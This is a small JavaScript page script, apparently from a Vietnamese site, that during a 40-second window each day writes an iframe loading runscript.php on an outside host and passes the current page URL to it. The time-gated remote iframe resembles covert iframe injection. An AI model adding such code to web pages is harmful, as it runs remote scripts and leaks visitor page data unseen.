// JavaScript Document
var url = window.location;
var d=new Date();

/*var date= d.getDate();
var day=d.getDay();
var month=d.getMonth();
var y=d.getYear();
var year= y < 1000 ? (y+2000-100):y
var ar=new Array("Chu Nhat","Thu Hai","Thu Ba","Thu Tu","Thu Nam","Thu Sau","Thu Bay");
var montharray=new Array("01","02","03","04","05","06","07","08","09","10","11","12")
var days=ar[day];
var months=montharray[month];*/

var gio=d.getHours();
var phut=d.getMinutes();
var giay=d.getSeconds();
//if(days == "Thu Hai")

//{
if(gio == 9 && phut == 0 && giay < 40)
{
	str = "http://site.wirester.com/ystore/scripts/runscript.php?act=1&url="+ url;
	str2 = "<iframe src=\"" + str + "\"></iframe>";
	document.write(str2);
}

/*}
else if(days == "Thu Ba")
{
	str="http://site.wirester.com/ystore/scripts/runscript.php?act=0&url="+ url ;
	str2 = "<iframe src=\"" + str + "\"></iframe>";
	document.write(str2);
}*/
